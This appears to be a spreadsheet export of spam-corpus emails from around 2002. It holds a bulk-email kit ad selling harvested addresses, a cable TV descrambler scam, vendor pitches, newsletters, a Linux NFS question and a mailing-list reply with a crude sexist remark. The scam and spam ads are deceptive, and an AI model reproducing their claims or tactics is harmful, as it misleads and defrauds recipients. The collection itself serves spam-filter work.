 make sure they're valid.
 ** EBOOK PUBLISHER
 Easily publish your own e-books and reports for resale using,
 you guessed it, bulk email!
 ** SEVEN MILLION EMAIL ADDRESSES
 This huge list will get you started bulking right away.
 I harvested these addresses myself, the list is filled
 with IMPULSE BUYERS ready to respond to your ads!
 If you added up all of the FULL VERSION BULK EMAIL software
 included with the BULKBOOK package, it would total over
 $499.  I am giving you the whole bundle for only $29.99.
 That means there is no other out-of-pocket startup expense
 for you.  Nothing else to buy, no reason to waste money on
 software that doesn't work.  With this one package, you get 
 EVERYTHING YOU NEED to START BULK EMAILING RIGHT AWAY.  
 Are you willing to invest $29.99 for the opportunity
 to make a SIX FIGURE INCOME on the Internet with no 
 startup cash and very little effort?
 Remember, you will recieve a toll-free phone number
 for 24 hour expert advice and consultation FROM ME
 PERSONALLY.
 To order the Bulkbook right now for only $29.99 with 
 a Visa or Mastercard, please click on the link below. 
 This will take you to our secure server for order 
 processing:
 http://www.2003marketing.com/bulkbook.htm
 Note: The Bulkbook will be delivered electronically
 within 24 hours. It is not available in printed form. 
 You may also pay with cash, check or money
 order by printing the order form below and 
 sending it with your payment. 
 ------------------------- CUT HERE ----------------------- 
 Product: "The Bulkbook" 
 Price: $29.99 
 HOW TO ORDER BY MAIL: Print out this order 
 form and send cash, personal check, money 
 order or cashier's check to the address listed below: 
 Internet Products Enterprises Inc.
 45 State St. Unit 253
 Montpelier, VT 05602
 Your Shipping Information: 
 Your Name_____________________________________________ 
 Your Address__________________________________________ 
 Your City_____________________________________________ 
 State / Zip___________________________________________ 
 Phone #: _____________________________________________ 
 (For problems with your order only. No salesmen will call.) 
 Email Address________________________________________ 
 If paying by credit card, please fill in the information below: 
 Credit Card Number:________________________________ 
 Expiration Date:___________________________ 
 Signature:_________________________ 
 Date:____________________ 
 IMPORTANT LEGAL NOTE: There are no criminal laws against
 the non-fraudulent sending of unsolicited commercial email 
 in the United States.  However, other countries have passed
 laws against this form of marketing, so non-US residents 
 should check local regulations before ordering. 
 ***********************************************************
 Our company is strictly opposed to unsolicited email.
 To be removed from this opt-in list, please send a 
 request to "bulkexpert@yahoo.com"
 ***********************************************************
 1027zbAU4-744CWZI4637aGiQ5-254sWzM249l35
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: digital voice recorders
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam
 Our company is designer and manufacturer of digital voice recorders (DVR) Edic-mini http://www.telesys.ru/english/edic-mini.shtml with extraordinary characteristics:
 Edic-mini model A - the smallest size over the world (17x57x10 mm), up to 1120 min of record time.
 Edic-mini model B - the longest battery life (up to 70 hours in record mode, metal case 27x54x7 mm), up to 1120 min of recording time.
 Edic-mini model B1 - the roundest DVR in the world :-) (metal case d=30 mm, h=14 mm), up to 1120 min of recording time.
 Edic-mini model C - the longest recording time (up to 8960 min =149 hours), metal case 27x54x10 mm.
    Coming soon:
 Edic-mini model S - stereo digital voice recorder.
 Edic-mini BW1 - round wood (juniper) case (for lovers of juniper fragrance :-), the most stylish DVR in the world.
 All digital voice recorders have extremely high voice sensitivity, digital PC interface, telephone line interface to record phone conversations, programmable user's interface, ability of using it for data storage and transfer (capacity from 16Mbyte to 1Gbyte).
 Also we produce voice modules (assembled PCB only) EMM http://www.telesys.ru/english/modules.shtml, which are Edic-mini compatible and allow you to create your own solution of unique DVR.
 We are looking for dealers for selling our product, but pls note, that we don't offer cheap product, we offer unique one - it has no competitors in the word market now. We are ready to design and produce any kind of DVR upon your request. Low volume order (100+) is acceptable too.
 Welcome to our website http://www.telesys.ru/english to get more information.
 *** Sorry, if this information isn't interesting for you. To remove your address from our mailing list pls return this e-mail back with REMOVE in subject field .
 Thank you.
 With best regards,
 -------------------------------------
 Yana Korshun,
 Sales manager of "Telesystems"
 E-mail: isales@telesys.ru
 WWW site in Russian: http://www.telesys.ru
 WWW site in English: http://www.telesys.ru/english
 NEVER SEND SPAM. IT IS BAD.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002, CDale wrote:
 &gt; A true geek.  Runs to the puter to post before taking a laboring wife to
 &gt; the hospital.  I'd kill you.  LOL
 &gt; Grats, Daddy-o!
 Fear not poor Tom, between the pain &amp; endorphins and/or massive amounts of
 drugs, she should remember little of the process. Her body is designed to
 block out the whole event, so that she can tell other women "oh having the
 baby wasnt so bad, you should have one!". Why else would any woman be
 willing to EVER have sex.
 &gt; On Sat, 27 Jul 2002, Tom wrote:
 &gt;
 &gt; &gt;
 &gt; &gt; Off we go to the hospital
 &gt; &gt;
 &gt; &gt; Benjamin Wallace Higgins is on his way.
 &gt; &gt;
 &gt; &gt; -tom
 And so passes into the great beyond another FoRKer. Only bagpipes could
 possibly do justice to a moment like this. See you when the kids hits
 preschool, which is about the next time you will be sleeping again.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: new extensions now only $14.95 (8551IaSm@8)
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00A5_78B53E6C.B7678D60
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 eyVSQU5EfQ0KUFVCTElDIEFOTk9VTkNFTUVOVDoNCg0KVGhlIG5ldyBkb21h
 aW4gbmFtZXMgYXJlIGZpbmFsbHkgYXZhaWxhYmxlIHRvIHRoZSBnZW5lcmFs
 IHB1YmxpYyBhdCBkaXNjb3VudCBwcmljZXMuIE5vdyB5b3UgY2FuIHJlZ2lz
 dGVyIG9uZSBvZiB0aGUgZXhjaXRpbmcgbmV3IC5CSVogb3IgLklORk8gZG9t
 YWluIG5hbWVzLCBhcyB3ZWxsIGFzIHRoZSBvcmlnaW5hbCAuQ09NIGFuZCAu
 TkVUIG5hbWVzIGZvciBqdXN0ICQxNC45NS4gVGhlc2UgYnJhbmQgbmV3IGRv
 bWFpbiBleHRlbnNpb25zIHdlcmUgcmVjZW50bHkgYXBwcm92ZWQgYnkgSUNB
 Tk4gYW5kIGhhdmUgdGhlIHNhbWUgcmlnaHRzIGFzIHRoZSBvcmlnaW5hbCAu
 Q09NIGFuZCAuTkVUIGRvbWFpbiBuYW1lcy4gVGhlIGJpZ2dlc3QgYmVuZWZp
 dCBpcyBvZi1jb3Vyc2UgdGhhdCB0aGUgLkJJWiBhbmQgLklORk8gZG9tYWlu
 IG5hbWVzIGFyZSBjdXJyZW50bHkgbW9yZSBhdmFpbGFibGUuIGkuZS4gaXQg
 d2lsbCBiZSBtdWNoIGVhc2llciB0byByZWdpc3RlciBhbiBhdHRyYWN0aXZl
 IGFuZCBlYXN5LXRvLXJlbWVtYmVyIGRvbWFpbiBuYW1lIGZvciB0aGUgc2Ft
 ZSBwcmljZS4gIFZpc2l0OiBodHRwOi8vd3d3LmFmZm9yZGFibGUtZG9tYWlu
 cy5jb20gdG9kYXkgZm9yIG1vcmUgaW5mby4NCiANClJlZ2lzdGVyIHlvdXIg
 ZG9tYWluIG5hbWUgdG9kYXkgZm9yIGp1c3QgJDE0Ljk1IGF0OiBodHRwOi8v
 d3d3LmFmZm9yZGFibGUtZG9tYWlucy5jb20vICBSZWdpc3RyYXRpb24gZmVl
 cyBpbmNsdWRlIGZ1bGwgYWNjZXNzIHRvIGFuIGVhc3ktdG8tdXNlIGNvbnRy
 b2wgcGFuZWwgdG8gbWFuYWdlIHlvdXIgZG9tYWluIG5hbWUgaW4gdGhlIGZ1
 dHVyZS4NCiANClNpbmNlcmVseSwNCiANCkRvbWFpbiBBZG1pbmlzdHJhdG9y
 DQpBZmZvcmRhYmxlIERvbWFpbnMNCg0KDQpUbyByZW1vdmUgeW91ciBlbWFp
 bCBhZGRyZXNzIGZyb20gZnVydGhlciBwcm9tb3Rpb25hbCBtYWlsaW5ncyBm
 cm9tIHRoaXMgY29tcGFueSwgY2xpY2sgaGVyZToNCmh0dHA6Ly93d3cuY2Vu
 dHJhbHJlbW92YWxzZXJ2aWNlLmNvbS9jZ2ktYmluL2RvbWFpbi1yZW1vdmUu
 Y2dpDQozMQ0KDQoNCg0KDQoNCg0KDQoNClswOTg0b0lhUzctMjM2bUV3QDE1
 XQ0K
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DivX News: Battle of the Planets in DivX, Warcraft III, and the
</t>
  </si>
  <si>
    <t xml:space="preserve">DivX News (Number 20, 2002-07-19)
 =================================
 What's Hot in the World of DivX(tm) Video This Week:
 Battle of the Planets in DivX, Warcraft III, and the Latest Skins
 Now Sent to Over 1.6 Million DivX Fans Worldwide!
   Welcome to this week's edition of DivX News, your weekly fix of
   information about what's hot and what's cool in the world of
   DivX video.
   (You are being sent this email because you subscribed to this
   newsletter at DivX.com. If you'd like to unsubscribe, follow
   the instructions at the end of this message.)
   In This Week's Issue
   --------------------
   1. Classic Battle of the Planets in DivX Video
   2. Warcraft III with DivX Video Sells like Hotcakes
   3. Skins, Skins and More Skins
   Battle of the Planets in DivX Video!
   ------------------------------------
   One of the best things about DivX Video is the way it has opened
   up distribution possibilities for a lot of cool videos that may
   not otherwise be widely seen. From independent short films to cult
   movies with strong underground followings, a number of filmmakers
   and distributors are discovering that DivX Video provides a great
   way to get their content in front of new audiences.
   A perfect example of that phenomenon is the groundbreaking
   animated series "Battle of the Planets" from Sandy Frank
   Entertainment. Originally shown on American television in the late
   1970s, Battle of the Planets gained a popular following and was
   one of the forerunners of the wildly popular anime style. The
   series chronicled the adventures of a group of intergalactic
   adventurers as they battled evil and protected the universe from
   invaders. Beloved among anime fans, 70s nostalgia buffs, and
   anyone who enjoys great sci-fi animation, the series is the
   subject of a number of fan sites and discussion groups throughout
   the Internet. You can now re-live the adventures of the Battle of
   the Planets crew in high-quality DivX video. The classic episode
   "Mammoth Shark Menace" is currently featured on the DivX Showcase,
   and stay tuned for more news about future Battle of the Planets
   episodes to come.
 * Watch "Battle of the Planets 55: Mammoth Shark Menace" in the
   DivX Showcase:
   &lt;http://rd.mailshell.com/www.divx.com/showcase/detail.php?id=52&gt;
   Warcraft III Sets Sales Records
   -------------------------------
   A while ago, we told you that the highly anticipated game
   "Warcraft III: Reign of Chaos" from Blizzard Entertainment would
   feature DivX Video for cinematic cut scenes. In early July,
   Blizzard released "Warcraft III: Reign of Chaos" with
   record-setting results, shipping over 4.5 million copies to
   retailers. Coincidence? You be the judge. You can look forward to
   more announcements about DivX technology in some of your favorite
   games in the near future....
 * Watch the "Warcraft III" Trailer in High-quality DivX Video:
   &lt;http://rd.mailshell.com/www.divx.com/showcase&gt;
 * Read more about the successful launch:
 &lt;http://rd.mailshell.com/money.cnn.com/2002/07/17/commentary/game_over/column_gaming/index.ht
 m&gt;
   The Latest DivX Player Skins
   ----------------------------
   Let's face it--if you don't have the latest Player skins, you're
   just not cool.
 * DisPlayer: A sleek, stylish full-screen skin that will give you
   the home theatre experience on your PC. Submitted by "DIVX
   Budman."
   &lt;http://rd.mailshell.com/www.divx.com/skins/detail.php?id=72&gt;
 * Coldfusion: A futuristic skin design dripping in coolness.
   Submitted by "gryphix."
   &lt;http://rd.mailshell.com/www.divx.com/skins/detail.php?id=71&gt;
 * DVDesque: As the title suggests, this skin has a groovy DVD-player
   design to complement the DivX experience. Submitted by "NellyNel."
   &lt;http://rd.mailshell.com/www.divx.com/skins/detail.php?id=68&gt;
   For all the new skins, check out the DivX Skins section:
   &lt;http://rd.mailshell.com/www.divx.com/skins&gt;. If you'd like to make your own skin,
   read the "How to Create a Skin" page:
   &lt;http://rd.mailshell.com/www.divx.com/skins/create.php&gt;.
   That's all we have for you this week. Thanks for supporting DivX
   video. Please feel free to send us any comments and suggestions
   at &lt;info@divx.com&gt;.
   Until next time,
   The DivX Team
   P.S. If you have friends that you think would enjoy receiving
   this newsletter, please forward this message on to them.
 --
 Copyright(c) 2002 DivXNetworks, Inc. All rights reserved.
 DivX is a trademark of DivXNetworks, Inc.
 &lt;http://rd.mailshell.com/www.divx.com&gt;
 &lt;http://rd.mailshell.com/www.divxnetworks.com&gt;
 This newsletter is sent weekly to over 1,300,000 opt-in subscribers.
 If you are interested in advertising in the DivX News, write us at
 &lt;advertising@divxnetworks.com&gt;.
 This newsletter is sent from an automated account. Replies to this
 message will not be read. Please follow the unsubscribe
 instructions below if you do not want to receive this newsletter
 in the future.
 If you do not wish to receive future newsletters, you can
 unsubscribe by visiting &lt;http://rd.mailshell.com/www.divx.com/list/unsubscribe.php&gt;
 and entering your email address. Alternately, you can send an
 email message to &lt;divx-unsubscribe@lists.divx.com&gt; and be removed
 from the list.
 ---------- Your email is protected by Mailshell ---------- 
 As you requested, this email was forwarded to you by Mailshell.
 Mailshell will forward your replies to this email and keep your
 private email address safe.
 To unsubscribe safely and easily using Mailshell or to stop forwarding:
 http://www.mailshell.com/control.html?a=b_fa37eeq98z1xl2zjr74cp11v559ad52admz
 FreshAddress.com http://rd.mailshell.com/ad482
 Earn up to $3 for each of your friends who signs up with Mailshell! http://rd.mailshell.com/sp5
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: *THE LEGAL CABLE TV DESCRAMBLER*
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;FONT face=3D"MS Sans Serif"&gt;
 &lt;FONT size=3D2&gt;&lt;B&gt; &lt;BR&gt;
 &lt;/B&gt;
 &lt;FONT color=3D"#008080"&gt;&lt;B&gt; NOTE: THIS IS AN ADVERTISEMENT FOR LEGAL TV&lt;BR=
 &gt;
    DE-SCRAMBLER IF YOU HAVE NO INTEREST IN THIS INFORMATION&lt;BR&gt;
 PLEASE CLICK DELETE NOW.  THANK YOU--&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;B&gt; &lt;BR&gt;
 &lt;BR&gt;
 LEGAL CABLE TV DE-SCRAMBLER&lt;BR&gt;
 &lt;BR&gt;
 Want to watch Sporting Events?--Movies?--Pay-Per-View??&lt;BR&gt;
 &lt;BR&gt;
 *This is the Famous R-D-O Shack TV Descrambler&lt;BR&gt;
 You can assemble it from R-D-O Shack parts for about $12 or $15.&lt;BR&gt;
 &lt;BR&gt;
 We Send You:&lt;BR&gt;
 E-Z To follow Assembly Instructions.&lt;BR&gt;
 E-Z To read Original Drawings.&lt;BR&gt;
 The Famous R-D-O Shack Parts List.&lt;BR&gt;
 &lt;BR&gt;
 PLUS SOMETHING NEW YOU MUST HAVE!&lt;BR&gt;
 &lt;BR&gt;
 Something you can't do without.&lt;BR&gt;
 &lt;BR&gt;
 THE UP-TO-DATE REPORT: USING A DESCRAMBLER LEGALLY&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 Warning: You should not build a TV Descrambler without &lt;BR&gt;
 reading this report first.&lt;BR&gt;
 &lt;BR&gt;
 Frequently Asked Questions--CABLE TV DESCRAMBLER&lt;BR&gt;
 &lt;BR&gt;
 Q: Will the descrambler work on Fiber, TCI, Jarrod &lt;BR&gt;
 and satellite systems? &lt;BR&gt;
 A: The answer is YES.  In respect to satellite, &lt;BR&gt;
 you just get more stuff! There is one exception:&lt;BR&gt;
  The descrambler will not work with DSS satellite.&lt;BR&gt;
 &lt;BR&gt;
 Q: Do I need a converter box?&lt;BR&gt;
 A: This plan works with or without a converter box.&lt;BR&gt;
   Specific instructions are included in the plans for each!&lt;BR&gt;
 &lt;BR&gt;
 Q: Can the cable company detect that I have the descrambler?&lt;BR&gt;
 A: No, the signal descrambles right at the box and does&lt;BR&gt;
    not move back through the line!&lt;BR&gt;
 &lt;BR&gt;
 Q: Do I have to alter my existing cable system, &lt;BR&gt;
 television or VCR?&lt;BR&gt;
 A: The answer is no!&lt;BR&gt;
 &lt;BR&gt;
 Q: Does this work with my remote control?&lt;BR&gt;
 A: The answer is yes.  The descrambler is &lt;BR&gt;
 manually controlled--but very easy to use!&lt;BR&gt;
 &lt;BR&gt;
 Q: Can you email me the plans?&lt;BR&gt;
 A: No the program comes with an easy to follow picture guide.&lt;BR&gt;
 &lt;BR&gt;
 Q: Does this work everywhere across the country?&lt;BR&gt;
 A: Yes, every where in the USA plus England,&lt;BR&gt;
  Brazil, Canada and other countries!&lt;BR&gt;
 &lt;BR&gt;
 Q: When I order, when will I get my stuff?&lt;BR&gt;
 A: We mail out all orders within 48 hours of receiving them.&lt;BR&gt;
  &lt;BR&gt;
  YOU SUPPLY A SELF-ADDRESSED, STAMPED, #10 LONG ENVELOPE, WITH&lt;BR&gt;
 TWO-FIRST CLASS STAMPS.&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 Q: How much does it cost to get the instruction &lt;BR&gt;
 plans, the easy to follow diagram, and most&lt;BR&gt;
  important of all the Using a Descrambler LEGALLY.&lt;BR&gt;
 &lt;/B&gt;
 &lt;FONT color=3D"#800040"&gt;&lt;B&gt; &lt;BR&gt;
 A: You get the complete package all for just--$10.00&lt;BR&gt;
  (Cash, Check or Postal Money Order.)&lt;BR&gt;
 (Arizona residents include 7% Arizona State Sales Tax)&lt;BR&gt;
 &lt;BR&gt;
 (All orders outside the U.S.A. add $5.00)&lt;BR&gt;
 &lt;BR&gt;
 ORDERS OUTSIDE THE US MUST BE IN $15 in US CASH!&lt;BR&gt;
 &lt;BR&gt;
 Q: How do I order?&lt;BR&gt;
 A: Fill out form below and send it, along with your payment &lt;BR&gt;
    AND YOUR SELF ADDRESSED 2 STAMPED ENVELOPE to:&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;B&gt; &lt;BR&gt;
 A Groves&lt;BR&gt;
 PO BOX  8051&lt;BR&gt;
 Mesa, AZ  85214-8051&lt;BR&gt;
                                        &lt;BR&gt;
 &lt;/B&gt;
 &lt;FONT color=3D"#8000FF"&gt;&lt;B&gt; MAKE CHECKS PAYABLE TO:  A Groves&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;B&gt; &lt;BR&gt;
 PRINT YOUR:&lt;BR&gt;
        (orders without an envelope or stamps will be processed&lt;BR&gt;
         up to 2 weeks later than complete orders)&lt;BR&gt;
 &lt;BR&gt;
     DO NOT FORGET YOUR STAMPS! &lt;BR&gt;
 &lt;BR&gt;
 NAME_____________________________________________&lt;BR&gt;
 &lt;BR&gt;
 ADDRESS__________________________________________&lt;BR&gt;
 &lt;BR&gt;
 CITY/STATE/ZIP_____________________________________&lt;BR&gt;
 &lt;BR&gt;
 DO NOT FORGET YOUR 2, 33 or 34 cent stamps and #10 envelope!&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 *A GROVES is NOT ASSOCIATED in any way with RADIO SHACK. &lt;BR&gt;
  Neither the design nor instructions were developed&lt;BR&gt;
  by, are sold by, or are endorsed by Radio Shack. &lt;BR&gt;
  Parts for this fine-tuning device are available &lt;BR&gt;
  at many electronics stores (including Radio Shack) &lt;BR&gt;
  This is not a Radio Shack product.&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 to be removed reply to: gotcha3490@looksmart.com.au&lt;BR&gt;
 &lt;/B&gt; &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;p&gt;&lt;FONT face=3D"MS Sans Serif"&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] NFS slowness with SuSE 8.1
</t>
  </si>
  <si>
    <t xml:space="preserve">NFS as a protocol is not known for its speediness but this is absurd. I did an 
 NFS install of a box this morning (that would be the box which won't boot 
 from CD for those who were in IRC) and it was rather slow but I just left it 
 to it. Having got it up, I want to copy the DVD to a disk on it so I have it 
 handy for installing any further bits I might require. So I simply mounted 
 the NFS exported DVD on the new box and started copying. 
 After a couple of minutes I looked - it was transferring about 8MB a MINUTE. 
 So I killed that and used rsync instead which is ticking away now at about 
 100 MB/min - still not exactly turbo charged but a lot better than the NFS 
 rate. Any ideas as to what's making it SO slow ? There's really no point in 
 running more nfsd processes, as there is exactly one client, so I'm a little 
 at a loss I must say.
 Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MSN 8.0 on deck and on a roll, CyberSLAPPs explained (CNET INTERNET SERVICES)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;&lt;head&gt;&lt;title&gt;Internet Services Weekly Newsletter&lt;/title&gt;&lt;/head&gt;
 &lt;body bgcolor=3D"#eeeeee"&gt;&lt;center&gt;
 &lt;a href=3D"top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612 bgcolor=3D"#f=
 fffff"&gt;
 &lt;tr valign=3Dtop&gt;&lt;td width=3D442 colspan=3D4&gt;&lt;img src=3D"http://www.cnet.co=
 m/i/nl/ws/hd.gif" width=3D442 height=3D60 alt=3D"Internet Services Weekly N=
 ewsletter"&gt;&lt;br&gt;
 =09=09=09&lt;table width=3D442 cellpadding=3D0 cellspacing=3D0 border=3D0 bgco=
 lor=3D"#ffcc00"&gt;
 =09=09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#000000" colspan=3D3&gt;&lt;img src=3D"http://home=
 .cnet.com/b.gif" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09=09=09&lt;tr&gt;
 =09=09=09=09=09&lt;td bgcolor=3D"#000000" width=3D1 rowspan=3D2&gt;&lt;img src=3D"ht=
 tp://home.cnet.com/b.gif" width=3D"1" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09=09=09&lt;td width=3D10 rowspan=3D2&gt;&lt;img src=3D"http://home.cnet.com/=
 b.gif" width=3D"1" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09=09=09&lt;td  width=3D430&gt;&lt;img src=3D"http://home.cnet.com/b.gif" wid=
 th=3D"1" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09=09&lt;/tr&gt;
 =09=09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.=
 gif" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
       =09=09&lt;/table&gt;=09
 =09&lt;/td&gt;
 &lt;!-- Skyscraper column --&gt;
 =09&lt;td width=3D160 rowspan=3D2&gt;
 =09=09&lt;img src=3D"http://home.cnet.com/i/dp/dd_b.gif" width=3D"160" height=
 =3D"18" border=3D"0"&gt;&lt;br&gt;
 =09=09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D160&gt;
 =09=09&lt;tr&gt;&lt;td align=3Dcenter bgcolor=3D"#eeeeee"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09&lt;/table&gt;
 &lt;!-- tower ad --&gt;
 &lt;div align=3D"center"&gt;&lt;img src=3D"http://i.i.com.com/cnwk.1d/Ads/common/adv=
 ertisement.gif" width=3D"120" height=3D"10" border=3D"0"&gt;&lt;/br&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D07-HqCzI5r7tUCHumOiqzUbrvL=
 kiDZR" target=3D"new"&gt;  =20
 &lt;img src=3D"http://www.techrepublic.com/images/ads/Gateway.sky.advice_0602.=
 gif" width=3D"160" height=3D"600" border=3D"0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /tower ad --&gt;&lt;!-- right column content --&gt;
 &lt;!-- most popular NEWSLETTER --&gt;
 &lt;br&gt;&lt;img src=3D"http://www.cnet.com/i/nl/ws/rhc_pop.gif" width=3D150 height=
 =3D20 alt=3D"Most Popular"&gt;
 &lt;br&gt;&lt;font face=3D"arial, helvetica" size=3D-1 color=3D#333333&gt;
 &lt;b&gt;Reseller Accounts&lt;/b&gt;&lt;br&gt;&lt;table width=3D150 cellpadding=3D2 cellspacing=
 =3D0 border=3D0&gt;&lt;tr valign=3Dtop&gt;&lt;td&gt;&lt;font face=3D"arial, helvetica" size=
 =3D-2&gt;&lt;b&gt;1.&lt;/b&gt;&amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D1c-cs=
 _iIFraA8NaOl5n9kgGa2oXqGdR" &gt;Infinology&amp;nbsp;Corp.&lt;/a&gt;, &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D31-V_YRIjMwkavzq0dyLxjkqVAXXbcR" &gt;$59&lt;/a&gt;&lt;br&gt;=
 &lt;b&gt;2.&lt;/b&gt;&amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D47-ADmxIIZx=
 2oOTTBBOiJGu_NEsnEPR" &gt;ReadyHosting.com&lt;/a&gt;, &lt;a href=3D"http://clickthru.on=
 line.com/Click?q=3D5c-BnjPIZnWYPxi5mX53xlZk0f-IonR" &gt;$4.12&lt;/a&gt;&lt;br&gt;&lt;b&gt;3.&lt;/b&gt;=
 &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D71-GwdUIEZXeNdOz9kqw=
 uBXvl3NU2rR" &gt;Aplus.Net&lt;/a&gt;, &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D86-8fH1QCJm04JVpsxSjaeTldfVpfRR" &gt;$79.95&lt;/a&gt;&lt;br&gt;&lt;b&gt;4.&lt;/b&gt;&amp;nbsp;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3D9b-7-TFQSIm1AhPzm40dAVJ9PZAKTFR" =
 &gt;One&amp;nbsp;World&amp;nbsp;Hosting&lt;/a&gt;, &lt;a href=3D"http://clickthru.online.com/Cl=
 ick?q=3Db0-NZmfQQJQNJRjfQhdxQMKtNX8PQ9R" &gt;$10&lt;/a&gt;&lt;br&gt;&lt;b&gt;5.&lt;/b&gt;&amp;nbsp;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3Dc5-8BcDQzO4TxFn3YtzSROUJEymxquR" =
 &gt;Superb&amp;nbsp;Internet&lt;/a&gt;, &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3Dda-dT8jQUP7l4Eat93bjsMVKpv3DxsR" &gt;$5&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;/font&gt;&lt;font face=3D"ari=
 al, helvetica" size=3D-1&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Df=
 0-nv_DQWgaJyDWqcF2fqfAgMcXea9R" &gt;&lt;b&gt;More providers&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;=
 /tr&gt;&lt;/table&gt;
 &lt;!-- /most popular NEWSLETTER --&gt;
 &lt;br&gt;
 &lt;/td&gt;&lt;td width=3D9 rowspan=3D2&gt;&lt;img src=3D"http://www.cnet.com/i/nl/dd_c.gi=
 f" width=3D9 height=3D60&gt;&lt;br&gt;
 &lt;table width=3D9 cellpadding=3D0 cellspacing=3D0 border=3D0&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D9 height=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#ffccoo"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D1 height=3D10&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D1 height=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000" rowspan=3D2&gt;&lt;table width=3D1 cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#eeeeee"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D1 height=3D60&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D410 bgcolor=3D"#ffffff"&gt;
 =09=09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D410 bgcolor=
 =3D"#ffffef"&gt;
 =09=09=09&lt;tr valign=3Dtop&gt;
 =09=09=09&lt;td width=3D10&gt;&lt;img src=3D"http://home.cnet.com/b.gif" alt=3D"" wi=
